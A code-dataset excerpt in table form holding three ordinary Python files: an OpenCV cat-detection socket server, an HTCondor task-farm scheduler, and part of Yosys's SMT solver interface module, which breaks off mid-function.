source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
server.py | """Usage: catcha_server.py SERVER_PORT
Uses OpenCV's cat classifier to check image for cats, returns true or false.
Arguments:
SERVER_PORT port on which to start listening for image payloads
"""
import numpy as np
import cv2
import socket
from docopt import docopt
import sys
from threading import Thread
import base64
def check_for_cat(img_string):
img = cv2.imdecode(np.fromstring(base64.b64decode(img_string), np.uint8), cv2.IMREAD_COLOR)
detector = cv2.CascadeClassifier("haarcascade_frontalcatface_extended.xml")
rects = detector.detectMultiScale(img, scaleFactor=1.3, minNeighbors=3, minSize=(75,75))
if len(rects)== 0:
return "not_cat" #print("not_cat")
else:
return "cat" #print("cat")
def start_server(port):
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print('Socket created')
try:
soc.bind(("127.0.0.1", port))
print('Socket bind complete')
except socket.error as msg:
print('Bind failed. Error : ' + str(sys.exc_info()))
sys.exit()
soc.listen(10) #lol what does 10 even mean here???
while True:
conn, addr = soc.accept()
ip, port = str(addr[0]), str(addr[1])
print('Accepting connection from ' + ip + ':' + port)
try:
Thread(target=client_thread, args=(conn, ip, port)).start()
except:
print("Terible error!")
import traceback
traceback.print_exc()
soc.close()
def client_thread(conn, ip, port, MAX_BUFFER_SIZE = 50000):
# the input is in bytes, so decode it
input_from_client_bytes = conn.recv(MAX_BUFFER_SIZE)
# MAX_BUFFER_SIZE is how big the message can be
# this is test if it's sufficiently big
import sys
siz = sys.getsizeof(input_from_client_bytes)
if siz >= MAX_BUFFER_SIZE:
print("The length of input is probably too long: {}".format(siz))
# decode input and strip the end of line
input_from_client = input_from_client_bytes.decode("utf8").rstrip()
res = do_some_stuffs_with_input(input_from_client)
print("Result of processing {} is: {}".format(input_from_client, res))
vysl = res.encode("utf8") # encode the result string
conn.sendall(vysl) # send it to client
conn.close() # close connection
print('Connection ' + ip + ':' + port + " ended")
def do_some_stuffs_with_input(input_string):
"""
This is where all the processing happens.
Let's just read the string backwards
"""
return check_for_cat(input_string) #input_string[::-1]
if __name__ == '__main__':
args = docopt(__doc__)
start_server(int(args['SERVER_PORT']))
#check_for_cat(args['PATH_TO_IMAGE_THAT_MIGHT_CONTAIN_A_CAT'])
|
taskfarm.py | '''
Created on Jul 4, 2013
@author: Vlad & Bert
'''
from threading import Thread
from collections import deque
import os
import sys
import time
import submit_a_task
import get_run_time
import xmltodict
import pprint
pp = pprint.PrettyPrinter(indent=4,stream=sys.stderr)
class Error(Exception):
pass
class UnknownHtcTypeError(Error):
"""Exception raised for unknown tf_type or mode
Attributes:
tf_type -- NOT Either batch, online or workflow
mode -- NOT Either real or demo
"""
def __init__(self, tf_type,mode):
self.tf_type = tf_type
self.mode = mode
def __str__(self):
return "Unknown HTC start value: type %s and/or mode %s" % (self.tf_type, self.mode)
class UnimplementedHtcCombinationError(Error):
"""Exception raised for unimplemented combinations
Attributes:
tf_type -- Either batch, online or workflow
mode -- Either real or demo
"""
def __init__(self, tf_type,mode):
self.tf_type = tf_type
self.mode = mode
def __str__(self):
return "Unimplemented HTC start combination: type %s, mode %s" % (self.tf_type, self.mode)
class TaskFarm:
M_REAL = 'real'
M_DEMO = 'demo'
T_ONLINE = 'online'
T_WF = 'workflow'
T_BATCH= 'batch'
def add_worker(self, worker, worker_id):
self.registered_workers[worker_id]=worker
self.s_registered_workers[worker_id]=str(worker)
def remove_worker(self, worker_id):
del self.registered_workers[worker_id]
del self.s_registered_workers[worker_id]
def get_worker(self,worker_id):
return self.registered_workers[worker_id]
def get_worker_id(self,m_type):
for k in self.registered_workers:
if self.registered_workers[k].type==m_type:
return k
return None
def __init__(self, mode, tf_type):
self.jobs = {} # every entry is a job_id : [ list of bags ]
self.bags = {} # every entry is a job_id : num_of_executed_bags
self.counter = len(self.jobs)
self.registered_workers = {}
self.s_registered_workers = {}
self.mode = mode
if tf_type not in ('batch', 'online', 'workflow') and mode not in ('demo', 'real'):
raise UnknownHtcTypeError(tf_type, mode)
if tf_type in ('batch', 'workflow') or mode == 'demo':
raise UnimplementedHtcCombinationError(tf_type, mode)
self.type = tf_type
self.tf_job_dict = {} # contains simple info per job, per bag, i.e. job.bag : { TotalTasks:x, CompletedTasks:x, ReplicatedTasks:x, ReplicationFactor:x }
self.tf_job_info = {} # contains info on completed tasks i.e. job.bag: [ job.bag.task: [ task_dict 1, ... , task_dict_n ] ]
self.tf_dict = {'jobs':0,'bags':0,'submitted_tasks':0,'completed_tasks':0,'job_dict':self.tf_job_dict}
def __str__(self):
return 'TaskFarm: mode = ' + self.mode + ' , type = ' + self.type + "\n, workers:" + str(self.registered_workers) + "\n bots:" +str(self.jobs)
def add_bot(self, fullpath):
self.tf_dict['jobs'] += 1
job_id = self.counter = len(self.jobs)
self.jobs[self.counter] = deque([])
self.jobs[self.counter].append(fullpath)
jb_key = "%d.%d" % (job_id,0)
if not self.tf_job_dict.has_key(jb_key):
self.tf_job_dict[jb_key] = {}
self.tf_job_dict[jb_key]['SamplingStarted'] = False
self.bags[job_id] = 0
return job_id
def add_on(self, fullpath, jid, atend=True):
self.tf_dict['bags'] += 1 # count the total number of bags in the service
if atend:
self.jobs[jid].append(fullpath)
else:
self.jobs[jid].appendleft(fullpath)
return jid
def execute_job(self, job_id): # TODO need to specify which bag??
if job_id not in self.jobs:
return -1
# TODO check if this job has been sampled, and sampling is finished. Refuse to execute otherwise
Thread(target=self._do_execute_job, args=[job_id]).start()
def _do_execute_job(self, jid): # TODO need to specify which bag??
job_id = int(jid)
while True:
if len(self.jobs[job_id]) == 0:
time.sleep(2)
else:
while len(self.jobs[job_id]) > 0:
self.bags[job_id] += 1
bag_id = self.bags[job_id]
jb_key = "%d.%d" % (job_id,bag_id)
self.tf_job_dict[jb_key] = {}
bag_path = self.jobs[job_id].popleft()
lines = open(bag_path,'r').readlines()
line = 0
for l in lines:
submit_a_task.submit_a_task( job_id, bag_id, line, l, [] )
line += 1
#callback function that needs to state whether a task is done
print l
self.tf_job_dict[jb_key]['SamplingReady'] = False
self.tf_job_dict[jb_key]['CompletedTasks'] = 0
self.tf_job_dict[jb_key]['TotalTasks'] = line
self.tf_job_dict[jb_key]['SubmittedTasks'] = line
self.tf_dict['submitted_tasks'] += self.tf_job_dict[jb_key]['SubmittedTasks']
self.tf_dict['job_dict'] = self.tf_job_dict
Thread(target=self._do_poll, args=[job_id,self.bags[job_id]]).start()
def job_exists(self, job_id):
return job_id in self.jobs
def sample_job(self, job_id):
# TODO set up a thread for collecting all info when all tasks are finished
if job_id not in self.jobs:
return -1
# TODO check if a bag has already been sampled, and refuse to sample it again
bag_id = 0 # ALWAYS when sampling
jb_key = "%d.%d" % (job_id,bag_id)
if self.tf_job_dict[jb_key]['SamplingStarted'] == True:
if self.tf_job_dict[jb_key]['SamplingReady'] == True:
return -3
return -2
self.tf_dict['bags'] += 1
if not self.tf_job_dict.has_key(jb_key):
self.tf_job_dict[jb_key] = {}
replication_size = 7
print job_id
bag_path = self.jobs[job_id].popleft()
lines = open(bag_path,'r').read().splitlines()
N = len(lines)
print N
size = int((N* 1.96*1.96)//((1.96*1.96)+(2*(N-1))*(0.2*0.2)))
# def submit_a_task(jobnr, bagnr, tasknr, commandline, workerlist, thedict={}):
# first: find all available workertypes
type_list=[]
for w in self.registered_workers:
workertype = self.registered_workers[w].type
if workertype not in type_list:
type_list.append(workertype)
# second: submit all tasks in separate commands
self.tf_job_dict[jb_key]['SamplingReady'] = False
# TODO to use condor more efficiently, create just one ClassAd file
for i in range(0,size):
#function that submits on each worker type
print >> sys.stderr, 'sample_job sampling ', job_id, i, lines[i]
if i < replication_size: # to replicate job on all worker types, use type_list
submit_a_task.submit_a_task( job_id, bag_id, i, lines[i], type_list )
else:
submit_a_task.submit_a_task( job_id, bag_id, i, lines[i], [] )
# TODO Put all lines that were not yet submitted in a file for later execution, and put the filename "in front of" the queue
filename_leftovers = "%s/lo-j%d-b%d" % ( os.path.dirname(bag_path), job_id, bag_id )
print >> sys.stderr, "leftovers go in ", filename_leftovers
fd = open ( filename_leftovers, "w" )
for i in range(size, N):
fd.write(lines[i] + "\n")
fd.close()
self.add_on( filename_leftovers, job_id, False )
# some administration
self.tf_job_dict[jb_key]['SamplingStarted'] = True
self.tf_job_dict[jb_key]['SamplingReady'] = False
self.tf_job_dict[jb_key]['CompletedTasks'] = 0
self.tf_job_dict[jb_key]['TotalTasks'] = size
self.tf_job_dict[jb_key]['SubmittedTasks'] = size + replication_size * ( len ( type_list ) - 1 )
self.tf_dict['submitted_tasks'] += self.tf_job_dict[jb_key]['SubmittedTasks']
self.tf_dict['job_dict'] = self.tf_job_dict
# TODO wait for all jobs to complete and return the run-times
Thread(target=self._do_poll, args=[job_id,bag_id]).start()
# should return list of leftover tasks
return size
def callback_time(self, task_id):
self.timers[task_id] = 0
def _do_poll(self, job_id, bag_id):
_try = 0
jb_key = "%d.%d" % (job_id,bag_id)
filename = "hist-%d-%d.xml" % ( job_id, bag_id )
command = "condor_history -constraint 'HtcJob == %d && HtcBag == %d' -xml > %s" % ( job_id, bag_id, filename )
while True:
_try += 1
_trystr = "Try %d (%s) :" % (_try, jb_key)
# get condor_history and analyse
ret_val = os.system( command )
if ret_val != 0:
# wait a little until the first results come in
print >> sys.stderr, _trystr, "wait a little until the first results come in on", filename
time.sleep(1)
continue
# now we have created a file, check if it has any classads
xml = open(filename).read()
xmldict = xmltodict.parse(xml)
print >> sys.stderr, "type(xmldict) = ", type(xmldict)
if not ( type(xmldict) == dict and xmldict.has_key('classads') ):
print >> sys.stderr, _trystr, "No classads, wait a little until the first results come in"
time.sleep(4)
continue
print >> sys.stderr, "type(xmldict['classads']) = ", type(xmldict['classads'])
if not ( type(xmldict['classads']) == dict and xmldict['classads'].has_key('c') ) :
print >> sys.stderr, _trystr, "No classads <c> entries, wait a little until the first results come in"
time.sleep(4)
continue
print >> sys.stderr, "type(xmldict['classads']['c']) = ", type(xmldict['classads']['c'])
if not ( type(xmldict['classads']['c']) == list and xmldict['classads']['c'][0].has_key('a') ) :
print >> sys.stderr, _trystr, "No classads attributes, wait a little until the first results come in"
time.sleep(4)
continue
print >> sys.stderr, _trystr, "start polling", filename
poll_dict = get_run_time.get_poll_dict(xmldict)
print >> sys.stderr, _trystr, "polling done", filename
completed_tasks = 0
for _ in poll_dict.keys():
completed_tasks += len(poll_dict[_])
completed_task_sets = poll_dict.keys().__len__()
self.tf_dict['completed_tasks'] += ( completed_tasks - self.tf_job_dict[jb_key]['CompletedTasks'] )
self.tf_job_dict[jb_key]['CompletedTasks'] = completed_tasks
self.tf_job_dict[jb_key]['CompletedTaskSets'] = completed_task_sets
print >> sys.stderr, "polling %s, try %d: SubmittedTasks = %d, CompletedTasks = %d" % ( jb_key, _try, self.tf_job_dict[jb_key]['SubmittedTasks'], self.tf_job_dict[jb_key]['CompletedTasks'] )
#if _try == 50:
# self.tf_job_dict[jb_key]['SamplingReady'] = True
if self.tf_job_dict[jb_key]['CompletedTasks'] == self.tf_job_dict[jb_key]['SubmittedTasks']:
self.tf_job_info[jb_key] = poll_dict
self.tf_job_dict[jb_key]['SamplingReady'] = True
if self.tf_job_dict[jb_key]['SamplingReady'] == True:
pp.pprint(poll_dict)
return
time.sleep(4)
|
smtio.py | #
# yosys -- Yosys Open SYnthesis Suite
#
# Copyright (C) 2012 Clifford Wolf <clifford@clifford.at>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import sys, re, os, signal
import subprocess
if os.name == "posix":
import resource
from copy import deepcopy
from select import select
from time import time
from queue import Queue, Empty
from threading import Thread
from smtlog import SmtLog
# This is needed so that the recursive SMT2 S-expression parser
# does not run out of stack frames when parsing large expressions
if os.name == "posix":
smtio_reclimit = 64 * 1024
if sys.getrecursionlimit() < smtio_reclimit:
sys.setrecursionlimit(smtio_reclimit)
current_rlimit_stack = resource.getrlimit(resource.RLIMIT_STACK)
if current_rlimit_stack[0] != resource.RLIM_INFINITY:
smtio_stacksize = 128 * 1024 * 1024
if os.uname().sysname == "Darwin":
# MacOS has rather conservative stack limits
smtio_stacksize = 16 * 1024 * 1024
if current_rlimit_stack[1] != resource.RLIM_INFINITY:
smtio_stacksize = min(smtio_stacksize, current_rlimit_stack[1])
if current_rlimit_stack[0] < smtio_stacksize:
resource.setrlimit(resource.RLIMIT_STACK, (smtio_stacksize, current_rlimit_stack[1]))
# currently running solvers (so we can kill them)
running_solvers = dict()
forced_shutdown = False
solvers_index = 0
def force_shutdown(signum, frame):
global forced_shutdown
if not forced_shutdown:
forced_shutdown = True
if signum is not None:
print("<%s>" % signal.Signals(signum).name)
for p in running_solvers.values():
# os.killpg(os.getpgid(p.pid), signal.SIGTERM)
os.kill(p.pid, signal.SIGTERM)
sys.exit(1)
if os.name == "posix":
signal.signal(signal.SIGHUP, force_shutdown)
signal.signal(signal.SIGINT, force_shutdown)
signal.signal(signal.SIGTERM, force_shutdown)
def except_hook(exctype, value, traceback):
if not forced_shutdown:
sys.__excepthook__(exctype, value, traceback)
force_shutdown(None, None)
sys.excepthook = except_hook
hex_dict = {
"0": "0000", "1": "0001", "2": "0010", "3": "0011",
"4": "0100", "5": "0101", "6": "0110", "7": "0111",
"8": "1000", "9": "1001", "A": "1010", "B": "1011",
"C": "1100", "D": "1101", "E": "1110", "F": "1111",
"a": "1010", "b": "1011", "c": "1100", "d": "1101",
"e": "1110", "f": "1111"
}
class SmtModInfo:
def __init__(self):
self.inputs = set()
self.outputs = set()
self.registers = set()
self.memories = dict()
self.wires = set()
self.wsize = dict()
self.clocks = dict()
self.cells = dict()
self.asserts = dict()
self.covers = dict()
self.anyconsts = dict()
self.anyseqs = dict()
self.allconsts = dict()
self.allseqs = dict()
self.asize = dict()
class SmtIo:
def __init__(self, opts=None, logs=None):
global solvers_index
self.logic = None
self.logic_qf = True
self.logic_ax = True
self.logic_uf = True
self.logic_bv = True
self.logic_dt = False
self.forall = False
self.produce_models = True
self.smt2cache = [list()]
self.p = None
self.p_index = solvers_index
solvers_index += 1
if opts is not None:
self.logic = opts.logic
self.solver = opts.solver
self.solver_opts = opts.solver_opts
self.debug_print = opts.debug_print
self.debug_file = opts.debug_file
self.dummy_file = opts.dummy_file
self.timeinfo = opts.timeinfo
self.unroll = opts.unroll
self.noincr = opts.noincr
self.info_stmts = opts.info_stmts
self.nocomments = opts.nocomments
else:
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.timeinfo = os.name != "nt"
self.unroll = False
self.noincr = False
self.info_stmts = list()
self.nocomments = False
if logs is None:
self.smtlog = SmtLog()
else:
self.smtlog = logs
self.start_time = time()
self.modinfo = dict()
self.curmod = None
self.topmod = None
self.setup_done = False
def __del__(self):
if self.p is not None and not forced_shutdown:
os.killpg(os.getpgid(self.p.pid), signal.SIGTERM)
if running_solvers is not None:
del running_solvers[self.p_index]
def setup(self):
assert not self.setup_done
if self.forall:
self.unroll = False
if self.solver == "yices":
if self.noincr:
self.popen_vargs = ['yices-smt2'] + self.solver_opts
else:
self.popen_vargs = ['yices-smt2', '--incremental'] + self.solver_opts
if self.solver == "z3":
self.popen_vargs = ['z3', '-smt2', '-in'] + self.solver_opts
if self.solver == "cvc4":
if self.noincr:
self.popen_vargs = ['cvc4', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
else:
self.popen_vargs = ['cvc4', '--incremental', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
if self.solver == "mathsat":
self.popen_vargs = ['mathsat'] + self.solver_opts
if self.solver == "boolector":
if self.noincr:
self.popen_vargs = ['boolector', '--smt2'] + self.solver_opts
else:
self.popen_vargs = ['boolector', '--smt2', '-i'] + self.solver_opts
self.unroll = True
if self.solver == "abc":
if len(self.solver_opts) > 0:
self.popen_vargs = ['yosys-abc', '-S', '; '.join(self.solver_opts)]
else:
self.popen_vargs = ['yosys-abc', '-S', '%blast; &sweep -C 5000; &syn4; &cec -s -m -C 2000']
self.logic_ax = False
self.unroll = True
self.noincr = True
if self.solver == "dummy":
assert self.dummy_file is not None
self.dummy_fd = open(self.dummy_file, "r")
else:
if self.dummy_file is not None:
self.dummy_fd = open(self.dummy_file, "w")
if not self.noincr:
self.p_open()
if self.unroll:
assert not self.forall
self.logic_uf = False
self.unroll_idcnt = 0
self.unroll_buffer = ""
self.unroll_sorts = set()
self.unroll_objs = set()
self.unroll_decls = dict()
self.unroll_cache = dict()
self.unroll_stack = list()
if self.logic is None:
self.logic = ""
if self.logic_qf: self.logic += "QF_"
if self.logic_ax: self.logic += "A"
if self.logic_uf: self.logic += "UF"
if self.logic_bv: self.logic += "BV"
if self.logic_dt: self.logic = "ALL"
self.setup_done = True
for stmt in self.info_stmts:
self.write(stmt)
if self.produce_models:
self.write("(set-option :produce-models true)")
self.write("(set-logic %s)" % self.logic)
def timestamp(self):
secs = int(time() - self.start_time)
return "## %3d:%02d:%02d " % (secs // (60*60), (secs // 60) % 60, secs % 60)
def replace_in_stmt(self, stmt, pat, repl):
if stmt == pat:
return repl
if isinstance(stmt, list):
return [self.replace_in_stmt(s, pat, repl) for s in stmt]
return stmt
def unroll_stmt(self, stmt):
if not isinstance(stmt, list):
return stmt
stmt = [self.unroll_stmt(s) for s in stmt]
if len(stmt) >= 2 and not isinstance(stmt[0], list) and stmt[0] in self.unroll_decls:
assert stmt[1] in self.unroll_objs
key = tuple(stmt)
if key not in self.unroll_cache:
decl = deepcopy(self.unroll_decls[key[0]])
self.unroll_cache[key] = "|UNROLL#%d|" % self.unroll_idcnt
decl[1] = self.unroll_cache[key]
self.unroll_idcnt += 1
if decl[0] == "declare-fun":
if isinstance(decl[3], list) or decl[3] not in self.unroll_sorts:
self.unroll_objs.add(decl[1])
decl[2] = list()
else:
self.unroll_objs.add(decl[1])
decl = list()
elif decl[0] == "define-fun":
arg_index = 1
for arg_name, arg_sort in decl[2]:
decl[4] = self.replace_in_stmt(decl[4], arg_name, key[arg_index])
arg_index += 1
decl[2] = list()
if len(decl) > 0:
decl = self.unroll_stmt(decl)
self.write(self.unparse(decl), unroll=False)
return self.unroll_cache[key]
return stmt
def p_thread_main(self):
while True:
data = self.p.stdout.readline().decode("ascii")
if data == "": break
self.p_queue.put(data)
self.p_queue.put("")
self.p_running = False
def p_open(self):
assert self.p is None
self.p = subprocess.Popen(self.popen_vargs, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
running_solvers[self.p_index] = self.p
self.p_running = True
self.p_next = None
self.p_queue = Queue()
self.p_thread = Thread(target=self.p_thread_main)
self.p_thread.start()
def p_write(self, data, flush):
assert self.p is not None
self.p.stdin.write(bytes(data, "ascii"))
if flush: self.p.stdin.flush()
def p_read(self):
assert self.p is not None
if self.p_next is not None:
data = self.p_next
self.p_next = None
return data
if not self.p_running:
return ""
return self.p_queue.get()
def p_poll(self, timeout=0.1):
assert self.p is not None
assert self.p_running
if self.p_next is not None:
return False
try:
self.p_next = self.p_queue.get(True, timeout)
return False
except Empty:
return True
def p_close(self):
assert self.p is not None
self.p.stdin.close()
self.p_thread.join()
assert not self.p_running
del running_solvers[self.p_index]
self.p = None
self.p_next = None
self.p_queue = None
self.p_thread = None
def write(self, stmt, unroll=True):
self.smtlog.write_line(stmt) # Write log
if stmt.startswith(";"):
self.info(stmt)
if not self.setup_done:
self.info_stmts.append(stmt)
return
elif not self.setup_done:
self.setup()
stmt = stmt.strip()
if self.nocomments or self.unroll:
stmt = re.sub(r" *;.*", "", stmt)
if stmt == "": return
if unroll and self.unroll:
stmt = self.unroll_buffer + stmt
self.unroll_buffer = ""
s = re.sub(r"\|[^|]*\|", "", stmt)
if s.count("(") != s.count(")"):
self.unroll_buffer = stmt + " "
return
s = self.parse(stmt)
if self.debug_print:
print("-> %s" % s)
if len(s) == 3 and s[0] == "declare-sort" and s[2] == "0":
self.unroll_sorts.add(s[1])
return
elif len(s) == 4 and s[0] == "declare-fun" and s[2] == [] and s[3] in self.unroll_sorts:
self.unroll_objs.add(s[1])
return
elif len(s) >= 4 and s[0] == "declare-fun":
for arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
elif len(s) >= 4 and s[0] == "define-fun":
for arg_name, arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
stmt = self.unparse(self.unroll_stmt(s))
if stmt == "(push 1)":
self.unroll_stack.append((
deepcopy(self.unroll_sorts),
deepcopy(self.unroll_objs),
deepcopy(self.unroll_decls),
deepcopy(self.unroll_cache),
))
if stmt == "(pop 1)":
self.unroll_sorts, self.unroll_objs, self.unroll_decls, self.unroll_cache = self.unroll_stack.pop()
if self.debug_print:
print("> %s" % stmt)
if self.debug_file:
print(stmt, file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None and not stmt.startswith("(get-"):
self.p_close()
if stmt == "(push 1)":
self.smt2cache.append(list())
elif stmt == "(pop 1)":
self.smt2cache.pop()
else:
if self.p is not None:
self.p_write(stmt + "\n", True)
self.smt2cache[-1].append(stmt)
else:
self.p_write(stmt + "\n", True)
def info(self, stmt):
if not stmt.startswith("; yosys-smt2-"):
return
fields = stmt.split()
if fields[1] == "yosys-smt2-nomem":
if self.logic is None:
self.logic_ax = False
if fields[1] == "yosys-smt2-nobv":
if self.logic is None:
self.logic_bv = False
if fields[1] == "yosys-smt2-stdt":
if self.logic is None:
self.logic_dt = True
if fields[1] == "yosys-smt2-forall":
if self.logic is None:
self.logic_qf = False
self.forall = True
if fields[1] == "yosys-smt2-module":
self.curmod = fields[2]
self.modinfo[self.curmod] = SmtModInfo()
if fields[1] == "yosys-smt2-cell":
self.modinfo[self.curmod].cells[fields[3]] = fields[2]
if fields[1] == "yosys-smt2-topmod":
self.topmod = fields[2]
if fields[1] == "yosys-smt2-input":
self.modinfo[self.curmod].inputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-output":
self.modinfo[self.curmod].outputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-register":
self.modinfo[self.curmod].registers.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-memory":
self.modinfo[self.curmod].memories[fields[2]] = (int(fields[3]), int(fields[4]), int(fields[5]), int(fields[6]), fields[7] == "async")
if fields[1] == "yosys-smt2-wire":
self.modinfo[self.curmod].wires.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-clock":
for edge in fields[3:]:
if fields[2] not in self.modinfo[self.curmod].clocks:
self.modinfo[self.curmod].clocks[fields[2]] = edge
elif self.modinfo[self.curmod].clocks[fields[2]] != edge:
self.modinfo[self.curmod].clocks[fields[2]] = "event"
if fields[1] == "yosys-smt2-assert":
self.modinfo[self.curmod].asserts["%s_a %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-cover":
self.modinfo[self.curmod].covers["%s_c %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-anyconst":
self.modinfo[self.curmod].anyconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-anyseq":
self.modinfo[self.curmod].anyseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allconst":
self.modinfo[self.curmod].allconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allseq":
self.modinfo[self.curmod].allseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
def hiernets(self, top, regs_only=False):
def hiernets_worker(nets, mod, cursor):
for netname in sorted(self.modinfo[mod].wsize.keys()):
if not regs_only or netname in self.modinfo[mod].registers:
nets.append(cursor + [netname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiernets_worker(nets, celltype, cursor + [cellname])
nets = list()
hiernets_worker(nets, top, [])
return nets
def hieranyconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hieranyseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hiermems(self, top):
def hiermems_worker(mems, mod, cursor):
for memname in sorted(self.modinfo[mod].memories.keys()):
mems.append(cursor + [memname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiermems_worker(mems, celltype, cursor + [cellname])
mems = list()
hiermems_worker(mems, top, [])
return mems
def read(self):
stmt = []
count_brackets = 0
while True:
if self.solver == "dummy":
line = self.dummy_fd.readline().strip()
else:
line = self.p_read().strip()
if self.dummy_file is not None:
self.dummy_fd.write(line + "\n")
count_brackets += line.count("(")
count_brackets -= line.count(")")
stmt.append(line)
if self.debug_print:
print("< %s" % line)
if count_brackets == 0:
break
if self.solver != "dummy" and self.p.poll():
print("%s Solver terminated unexpectedly: %s" % (self.timestamp(), "".join(stmt)), flush=True)
sys.exit(1)
stmt = "".join(stmt)
if stmt.startswith("(error"):
print("%s Solver Error: %s" % (self.timestamp(), stmt), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return stmt
def check_sat(self):
if self.debug_print:
print("> (check-sat)")
if self.debug_file and not self.nocomments:
print("; running check-sat..", file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None:
self.p_close()
self.p_open()
for cache_ctx in self.smt2cache:
for cache_stmt in cache_ctx:
self.p_write(cache_stmt + "\n", False)
self.p_write("(check-sat)\n", True)
if self.timeinfo:
i = 0
s = "/-\|"
count = 0
num_bs = 0
while self.p_poll():
count += 1
if count < 25:
continue
if count % 10 == 0 or count == 25:
secs = count // 10
if secs < 60:
m = "(%d seconds)" % secs
elif secs < 60*60:
m = "(%d seconds -- %d:%02d)" % (secs, secs // 60, secs % 60)
else:
m = "(%d seconds -- %d:%02d:%02d)" % (secs, secs // (60*60), (secs // 60) % 60, secs % 60)
print("%s %s %c" % ("\b \b" * num_bs, m, s[i]), end="", file=sys.stderr)
num_bs = len(m) + 3
else:
print("\b" + s[i], end="", file=sys.stderr)
sys.stderr.flush()
i = (i + 1) % len(s)
if num_bs != 0:
print("\b \b" * num_bs, end="", file=sys.stderr)
sys.stderr.flush()
else:
count = 0
while self.p_poll(60):
count += 1
msg = None
if count == 1:
msg = "1 minute"
elif count in [5, 10, 15, 30]:
msg = "%d minutes" % count
elif count == 60:
msg = "1 hour"
elif count % 60 == 0:
msg = "%d hours" % (count // 60)
if msg is not None:
print("%s waiting for solver (%s)" % (self.timestamp(), msg), flush=True)
result = self.read()
if self.debug_file:
print("(set-info :status %s)" % result, file=self.debug_file)
print("(check-sat)", file=self.debug_file)
self.debug_file.flush()
if result not in ["sat", "unsat"]:
if result == "":
print("%s Unexpected EOF response from solver." % (self.timestamp()), flush=True)
else:
print("%s Unexpected response from solver: %s" % (self.timestamp(), result), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return result
def parse(self, stmt):
def worker(stmt):
if stmt[0] == '(':
expr = []
cursor = 1
while stmt[cursor] != ')':
el, le = worker(stmt[cursor:])
expr.append(el)
cursor += le
return expr, cursor+1
if stmt[0] == '|':
expr = "|"
cursor = 1
while stmt[cursor] != '|':
expr += stmt[cursor]
cursor += 1
expr += "|"
return expr, cursor+1
if stmt[0] in [" ", "\t", "\r", "\n"]:
el, le = worker(stmt[1:])
return el, le+1
expr = ""
cursor = 0
